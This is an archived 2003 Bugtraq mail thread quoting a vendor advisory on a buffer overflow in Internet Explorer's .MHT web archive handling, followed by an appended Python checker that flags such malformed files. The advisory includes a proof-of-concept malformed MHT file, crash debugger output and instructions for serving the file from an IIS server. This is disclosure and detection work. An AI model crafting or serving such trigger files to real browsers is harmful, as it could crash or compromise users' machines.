Message-ID: <001901c2e807$3d5ebff0$0200000a@pluto>
Date: Tue, 11 Mar 2003 20:48:51 +0100
From: "jelmer" <jelmer@...erus.xs4all.nl>
To: "Tom Tanaka" <tomatell@...on-sol.jp>, <bugtraq@...urityfocus.com>
Subject: Re: .MHT Buffer Overflow in Internet Explorer
I believe from IE6 SP1 on, IE doesn't open any mht files directly from the
web anymore. From the local filesystem it still works though.
----- Original Message -----
From: "Tom Tanaka" <tomatell@...on-sol.jp>
To: <bugtraq@...urityfocus.com>
Sent: Monday, March 10, 2003 5:30 AM
Subject: .MHT Buffer Overflow in Internet Explorer
>
>
> CANON SYSTEM SOLUTIONS INC. Security Alert
>
> VULNERABILITY: .MHT Buffer Overflow in Internet Explorer
>
> DATE FOUND: March 2, 2003
>
> Severity: High Risk (code can be executed remotely)
> ==============================================================================
> SUMMARY:
>
> IE5 introduced the new 'Web Archive' format for storing web pages, which
> have the extension MHT. The 'Web Archive' saves a web page as a single
> document complete with all images. The format is a standard
> mime/multipart e-mail message, a mime decoding program such as 7bit, 8bit
> and Base 64 decoder should be able to turn it into something usable with
> your OS and browser of choice.
>
> This format is pretty nifty and usable, however, there is a potential
> security breach found when used with encoded executable along with
> malformed MIME header in the 'Web Archive'. If the encoded data is
> executable or has a single word "MZP" encoded within and Content-Type is
> not designated, IE5 will be terminated by a critical buffer
> overflow. Consequently, one could compromise the client PC by executing
> malicious code in the memory.
> ==============================================================================
> AFFECTED SYSTEM:
>
> Microsoft Internet Explorer 5.5 and 6.0; prior versions are not
> vulnerable.
> ==============================================================================
> ANALYSIS:
>
> RFC822 describes the structure of the message header used for MIME. The
> following are some of the identifiers defined for the MIME header.
>
>  MIME-Version:
>  Content-Type:
>  Content-Transfer-Encoding:
>  Content-ID:
>  Content-Description:
>
> The 'Content-Type' is used for defining the types of media transferred.
> The 'Web Archive' format utilizes the Multipart/Related content-type
> (defined in RFC2387) to properly embed the multiple web content files. As
> described in RFC2387, the Multipart/Related content-type provides a
> common mechanism for representing objects that are aggregates of related
> MIME body parts. When transferring html or plain text data encoded in
> the 'Web Archive', IE5 interprets it as plain text with 'carriage return'
> code (0D0A), otherwise as binary data without 'carriage return' code
> (0D0A). By manipulating the MIME header structure and the Base64 encoded
> data as an executable, 4 bytes of memory can be overwritten.
>
>
> PROOF OF CONCEPT:
>
> The following format is usually used for the Web Archive.
> ----------------------------------------------
> From: <Saved from Microsoft Internet Explorer 5>
> Subject: =?iso-2022-jp?B?
> GyRCJT0lVSVIJSYlJyUiJVclbSVAJS8lSBsoQiBIb21lUGFnZQ==?=
> Date: Tue, 4 Mar 2003 02:16:23 +0900
> MIME-Version: 1.0
> Content-Type: multipart/related;
> boundary="----=_NextPart_000_0000_01C2E1F4.0D559EA0";
> type="text/html"
> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
>
> This is a multi-part message in MIME format.
>
> ------=_NextPart_000_0000_01C2E1F4.0D559EA0
> Content-Location:file:///tomatell.exe
> Content-Transfer-Encoding: base64
>
> TVpQ
> ----------------------------------------------
>
>
> The following sample format contains malformed MIME header along with the
> Base64 encoded executable.
> ----------------------------------------------
> MIME-Version: 1.0
> ------=_NextPart_000_0000_01C2E1F4.0D559EA0
> Content-Location:file:///tomatell.exe
> Content-Transfer-Encoding: base64
>
> TVpQ
> ----------------------------------------------
>
> Note that the encoded string, "TVpQ", is the Win32 EXE signature located
> at the first three bytes of the EXE header. This is for the Win32 system
> to identify the data as a Win32 executable file. IE5 somehow reads this
> signature and interprets the data as an executable whereas the MIME
> encoder/decoder module, 'inetcomm.dll', decodes it as plain 7 or 8 bit text
> data. Thus, IE5 creates a stream with a smaller buffer size than the
> Base64 decoder has.
>
>
> The following error will occur when the above file is browsed by IE5.
>
> Unhandled exception in iexplore.exe: 0xC0000005: Access Violation.
>
>
>
> By debugging through the crash dump, the exception error is generated at
> EIP (32-bit Instruction Pointer) = 74CF497E, called from inetcomm.dll into
> Kernel32.
>
> Register
> EAX = 00000000 EBX = 05AD3A20 ECX = 001FE074 EDX = 001FE190
> ESI = 05AD39D8 EDI = 00000000 [EIP = 74CF497E] ESP = 0607B2BC
> EBP = 0607B2FC EFL = 00000246
>
>
> \KernelObjects\CritSecOutOfMemoryEvent
>
> 74cf494c ff157412cd74 call dword ptr [KERNEL32.EnterCriticalSection]
> 74cf4952 834e3c02 or dword ptr [esi+3c],+02
> 74cf4956 33ff xor edi,edi
> 74cf4958 397e1c cmp dword ptr [esi+1c],edi
> 74cf495b 743f jz 74cf499c
> 74cf495d 397c2410 cmp dword ptr [esp+10],edi
> 74cf4961 8bce mov ecx,esi
> 74cf4963 7d06 jnl 74cf496b
> 74cf4965 ff742410 push dword ptr [esp+10]
> 74cf4969 eb25 jmp short 74cf4990
>
> 74cf496b c746441f000000 mov dword ptr [esi+44],0000001f
> 74cf4972 e888f3ffff call 74cf3cff
> 74cf4977 3bc7 cmp eax,edi
> 74cf4979 7c12 jl 74cf498d
> 74cf497b 8b461c mov eax,dword ptr [esi+1c]
> 74cf497e 8b08 mov ecx,dword ptr [eax] //Exception
>
>
> You could test the vulnerability by copying the above exploit to a file with
> the extension ".mht", placing it in the default root directory of an IIS web
> server, and setting it as the server's default html.
>
> WORKAROUND:
> Currently none available.
>
> Credit:
> Tom Tanaka
>
> /_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
> Tom Tanaka <tomatell@...on-sol.co.jp>
> Technical Manager, Security
> Software Products Department
> Tokyo Office
> CANON SYSTEM SOLUTIONS INC.
> 1-2-18 Ikenohata Taito-ku, Tokyo 110-0008, Japan
> Ph.: +81-3-5815-7243
> Fax : +81-3-5815-7262
> /_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
>
>
>
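As an added example that is not part of either message (neither jelmer's reply nor the quoted advisory), the following Python checker parses an .mht file with a small hand-written MIME splitter and reports the structural conditions the advisory describes: a top-level Content-Type that is missing (so no multipart/related declaration is present), parts that carry no Content-Type of their own, and base64 parts whose decoded bytes begin with the MZ signature. The sample inputs are constructed here: WELL_FORMED follows the advisory's first layout with a benign HTML part, and MALFORMED transcribes the advisory's second sample (including its Content-Location of file:///tomatell.exe). The function and variable names are this example's own, not anything from IE, inetcomm.dll or the advisory.

```python
"""Added example, not part of either message: a checker that flags .mht files with no
top-level Content-Type and base64 parts whose decoded bytes start with "MZ"."""
import base64
import binascii
import re

HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*):\s*(.*)$")

def split_headers(text):
    """Split an RFC822-style header block from the text after it. The block ends at the
    first blank line or at the first line that is neither 'Name: value' nor a folded
    continuation; the second rule is what lets the malformed sample parse at all."""
    headers, lines, last, i = {}, text.splitlines(), None, 0
    while i < len(lines):
        line = lines[i]
        if line.strip() == "":
            i += 1
            break
        if line[:1] in (" ", "\t") and last is not None:
            headers[last] += " " + line.strip()  # folded continuation line
        else:
            m = HEADER_RE.match(line)
            if m is None:
                break  # not a header line: the body starts here (no blank line seen)
            last = m.group(1).lower()
            headers[last] = m.group(2).strip()
        i += 1
    return headers, "\n".join(lines[i:])

def declared_boundary(headers):
    """Boundary parameter of the Content-Type header, or None if there is none."""
    m = re.search(r'boundary="?([^";\s]+)"?', headers.get("content-type", ""))
    return m.group(1) if m else None

def inferred_boundary(body):
    """Fallback when Content-Type is missing: treat the first '--...' line as the boundary."""
    for line in body.splitlines():
        if line.startswith("--") and len(line) > 2 and not line.endswith("--"):
            return line[2:].strip()
    return None

def split_parts(body, boundary):
    """Body parts between boundary delimiters; preamble and epilogue are dropped."""
    parts = []
    for chunk in body.split("--" + boundary)[1:]:
        if chunk.startswith("--"):  # closing delimiter; nothing after it is a part
            break
        parts.append(chunk.lstrip("\r\n"))
    return parts

def check_mht(text):
    """Report, for one .mht text, the structural conditions the advisory describes."""
    headers, body = split_headers(text)
    ctype = headers.get("content-type", "").lower()
    report = {"missing_content_type": "content-type" not in headers,
              "multipart_related": ctype.startswith("multipart/related"),
              "mz_parts": [], "parts_without_content_type": [], "undecodable_parts": []}
    boundary = declared_boundary(headers) or inferred_boundary(body)
    if boundary is None:
        return report
    for index, part in enumerate(split_parts(body, boundary)):
        part_headers, payload = split_headers(part)
        label = part_headers.get("content-location", f"part {index}")
        if "content-type" not in part_headers:
            report["parts_without_content_type"].append(label)
        if part_headers.get("content-transfer-encoding", "").lower() != "base64":
            continue
        try:  # strict decode: check the bytes ourselves instead of trusting the declared type
            decoded = base64.b64decode("".join(payload.split()), validate=True)
        except (binascii.Error, ValueError):
            report["undecodable_parts"].append(label)
            continue
        if decoded.startswith(b"MZ"):  # Win32 executable signature ("TVpQ" decodes to b"MZP")
            report["mz_parts"].append(label)
    return report

# Constructed samples: WELL_FORMED follows the advisory's first layout with a benign HTML
# part; MALFORMED transcribes the advisory's second (malformed) sample.
HTML_B64 = base64.b64encode(b"<html><body>constructed sample</body></html>").decode("ascii")
WELL_FORMED = f"""MIME-Version: 1.0
Content-Type: multipart/related;
  boundary="----=_NextPart_000_0000_01C2E1F4.0D559EA0";

This is a multi-part message in MIME format.

------=_NextPart_000_0000_01C2E1F4.0D559EA0
Content-Type: text/html
Content-Location: file:///index.html
Content-Transfer-Encoding: base64

{HTML_B64}
------=_NextPart_000_0000_01C2E1F4.0D559EA0--
"""
MALFORMED = """MIME-Version: 1.0
------=_NextPart_000_0000_01C2E1F4.0D559EA0
Content-Location:file:///tomatell.exe
Content-Transfer-Encoding: base64

TVpQ
"""
```

The strict base64 decode is deliberate: the advisory's point is that inetcomm.dll decoded the payload as 7 or 8 bit text while IE treated it as an executable, so a checker should look at the decoded bytes itself rather than trust the declared, or absent, type. A mail gateway or endpoint scan could run check_mht over .mht attachments and quarantine any file where missing_content_type is true or mz_parts is non-empty; running check_mht(MALFORMED) reports both for the advisory's sample, while check_mht(WELL_FORMED) reports neither.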